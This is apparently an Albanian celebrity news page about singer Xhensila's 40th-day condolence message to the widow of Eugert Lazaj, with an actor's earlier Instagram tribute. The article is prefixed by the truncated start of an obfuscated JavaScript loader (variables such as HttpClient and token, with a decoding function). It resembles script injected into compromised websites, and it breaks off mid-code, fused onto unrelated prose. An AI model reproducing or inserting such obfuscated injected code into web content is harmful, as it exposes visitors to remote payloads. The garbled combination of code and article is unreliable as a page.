;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

40 ditë morti, Xhensila me mesazh prekës për shoqen e ngushtë

By

Me datë 7 Gusht, aktori Bes Kallaku bëri një dedikim prekës për një prej miqve të tij më të ngushtë që u nda nga jeta në moshë të re.

Lamtumire shoku im i mire. Vertet te pabesueshme jane ndarjet prej jetes me njerezoret si ty, me miresine e zemres dhe buzeqeshjen e stampuar ne fytyren tende qe largon trishtimin. Por sot trishtueshem na ka mbet vec e qeshura jote dhe kujtimet. Kush te ka njohur e di shume mire se c’njeri ishe. I lehte dheu mbi ty, ne paqe shkofsh e pushofsh!’- shkruante Besi në Instagram.

Eugert Lazaj, pronar i “Adorion Palace” u gjet i vdekur në banesë në rrethana të paqarta duke mos u sqaruar nëse rasti ishte vrasje apo vetëvrasje. Prindërit e të ndjerit për mediat kishin deklaruar që pas mbylljes në shtëpi shkaku i coronavirusit, Eugerti kishte filluar të fiksohej i bindur se kishte njerëz që i vinin përqark shtëpisë.

E sot me të gdhirë dita, ka qenë Xhensila ajo që ka postuar një mesazh prekës për bashkëshorten e të ndjerit Lazaj, në ditën e 40-të të mortit.

E dashur motra ime. E di dhimbjen tende te gjithe ketyre 40 diteve per humbjen e gjysmes tende. Gjysem njeri, gjysem fryme. Sado afer mundemi te jemi ne krahun tend, prap ty te mungon krahu yt. Sa shkelqenit, sa te ndritnin syte. Deri sa vdekja te na ndaje, keshtu thuhet ne dashurite e verteta, dhe keshtu ndodh, keshtu ndodhi! Nuk kam dashur te te hap plage e as te t’kujtoj dhimbjen. Por sot kur ti e kujton, smundem te rri pa te ngushelluar se tepermi, edhe pse skam fuqi te te jap force por vec tek Zoti e gjetsh, tek femijet tuaj. E forte qofsh, ashtu si dashuria qe kishit!” – është shprehur këngëtarja e njohur në postimin e saj. /Prive.al

Artikuj të ngjashëm